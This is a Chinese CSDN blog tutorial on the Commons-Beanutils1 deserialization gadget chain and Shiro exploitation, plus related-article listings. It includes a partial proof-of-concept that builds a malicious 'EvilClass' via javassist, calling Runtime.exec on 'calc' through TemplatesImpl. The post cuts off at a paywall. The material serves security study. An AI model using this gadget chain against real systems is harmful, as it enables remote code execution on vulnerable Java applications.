Java反序列化之Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用

已于 2022-02-11 17:12:29 修改
阅读量1.4k 收藏 2
点赞数
文章标签: java
于 2022-02-11 17:09:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/122881740
版权

Apache Commons Beanutils

首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。
JavaBean可以简单的理解为一个Java类对象。
commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的demo:
demo

package org.example.cb1;

import org.apache.commons.beanutils.PropertyUtils;

import java.lang.reflect.InvocationTargetException;
public class Bean {

    private String name = "cb";
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException {
        System.out.println(PropertyUtils.getProperty(new Bean(),"name"));
        //在commons-beanutils中提供了静态方法PropertyUtils.getProperty,通过调用这个静态方法,可以直接调用任意JavaBean中的getter方法。
        System.out.println("cb");
    }
}

运行后会打印输出两个cb字符串。
在这里插入图片描述
在commons-beanutils中提供了静态方法PropertyUtils.getProperty,通过调用这个静态方法,可以直接调用任意JavaBean中的getter方法。
此时,commons-beanutils会自动找到name属性的getter方法,也就是getName ,然后调用,获得返回值。

CB1利用链分析

poc

package org.example.cb1;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CommonsBeanutils1Demo1 {
    // 修改值的方法,简化代码
    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(object, value);
    }

    public static void main(String[] args) throws Exception {
        // 创建恶意类,用于报错抛出调用链
        ClassPool pool = ClassPool.getDefault();
        CtClass payload = pool.makeClass("EvilClass");
        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");
        byte[] evilClass = payload.toBytecode();

        // set field
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "
最低0.47元/天 解锁文章
XiaoLeiZhaoO
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 958
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
commons-beanutils-1.9.4
09-06
在本文中,我们将深入探讨`commons-beanutils-1.9.4`这个版本,了解其核心功能、使用场景以及如何在项目中集成和应用。 Apache Commons BeanUtils库的主要目标是简化JavaBean对象的属性访问。它通过提供一系列静态...
Java反序列化漏洞——CommonsBeanutils1分析
Thunderclap的博客
02-20 1493
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过反射取值,而是通过反射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
Java项目中修复Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)详细说明
一火的专栏
11-18 9842
目录 1.漏洞说明 1.1阿里云漏洞短信内容 1.2阿里云漏洞详细报告 2.详细修复步骤 2.1下载漏洞验证工具 3.Java项目修改 3.1修改前注意事项 3.2Jar包准备 3.3增加一个自定义秘钥代码 3.4修改shiro配置 3.5修复后漏洞检测结果 4.常见问题 4.1Unsupported major.minor version 52.0 4.2org.springframework.web.servlet.mvc.annotation.AnnotationM..
Java工具库系列(十六):Apache Commons Collections
最新发布
阿里渣渣java研发组-群主
06-13 556
Apache Commons Collections 是 Apache Commons 项目的一部分,专注于提供增强的集合类和实用工具。新的集合类型(如BagMultiMapBidiMap高效的集合操作工具强大的集合装饰器Apache Commons Collections 是一个功能强大的工具库,通过提供丰富的集合类和实用方法,极大地简化了 Java 应用程序中的集合操作。在本篇文章中,我们介绍了 Commons Collections 的核心功能和使用方法。
Shiro反序列化漏洞利用笔记
文公子的博客
12-10 7189
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache Sh
[Java反序列化]CommonsBeanutils1利用学习
snowlyzz的博客
12-07 709
CommonsBeanutils1 shiro依赖反序列化分析
commons-beanutils-1.9.4-API文档-中文版.zip
05-09
赠送jar包:commons-beanutils-1.9.4.jar; 赠送原API文档:commons-beanutils-1.9.4-javadoc.jar; 赠送源代码:commons-beanutils-1.9.4-sources.jar; 赠送Maven依赖信息文件:commons-beanutils-1.9.4.pom; ...
commons-beanutils-1.9.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-beanutils-1.9.4.jar; 赠送原API文档:commons-beanutils-1.9.4-javadoc.jar; 赠送源代码:commons-beanutils-1.9.4-sources.jar; 赠送Maven依赖信息文件:commons-beanutils-1.9.4.pom; ...
commons-beanutilscommons-collectionscommons-collections等常用jar 包下载
02-23
1. **Apache Commons BeanUtils** - `commons-beanutils-1.9.3.jar` Apache Commons BeanUtils库是用于处理JavaBeans的工具类库。它提供了一种简单的方式来操纵JavaBean属性,无需直接调用getter和setter方法。这个...
commons-beanutils-1.9.3-API文档-中英对照版.zip
04-08
赠送jar包:commons-beanutils-1.9.3.jar; 赠送原API文档:commons-beanutils-1.9.3-javadoc.jar; 赠送源代码:commons-beanutils-1.9.3-sources.jar; 包含翻译后的API文档:commons-beanutils-1.9.3-javadoc-...
commons-beanutils-bean-collections.jar下载
01-19
commons-beanutils-bean-collections.jar commons-beanutils-bean-collections.jar
json用到的jar包(commons-beanutils.jar、commons-collections-3.1.jar等)
06-20
json相关jar包(不使用springmvc开发时)。其中包含(commons-beanutils.jar、commons-collections-3.1.jar、commons-lang-2.6.jar、commons-logging.jar、ezmorph-1.0.6.jar、json-lib-2.2.3-jdk15.jar)
JSONObject与JSONArray使用中所需要的完全jar包整理
07-10
JSONObject与JSONArray使用中所需要的完全jar包整理、需要依赖的包:commons-lang.jar commons-beanutils.jar commons-collections.jar commons-logging.jar  ezmorph.jar json-lib-2.2.2-jdk15.jar...
commons-beanutils-bean-collections.jar
12-23
commons-beanutils-bean-collections-1.7.0.jar
commons-beanutils-bean-collections-1.8.0.jar
01-20
commons-beanutils-bean-collections-1.8.0.jar
1:Commons BeanUtils组件简介
IT忍者神龟
07-02 715
我整理一下放到网上 最近没有时间,项目太忙了
Apache Commons项目简介之BeanUtils
NCNC
04-01 6228
                    Apache Commons项目简介之BeanUtils0.简介Apache Commons项目是专注于开发可重用的Java组件。Apache Commons项目由三部分组成:Commons Proper - 可重用Java组件库。Commons Sandbox - Java组件开发工作空间。Commons Dormant - sandbox中不活跃的项目存
commons-beanutils
07-17
您可以在以下网站下载commons-beanutils jar包: 1. Apache官方网站:https://commons.apache.org/proper/commons-beanutils/download_beanutils.cgi 2. Maven中央仓库:https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils 3. GitHub:https://github.com/apache/commons-beanutils/releases 请根据您的需要选择合适的版本进行下载。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值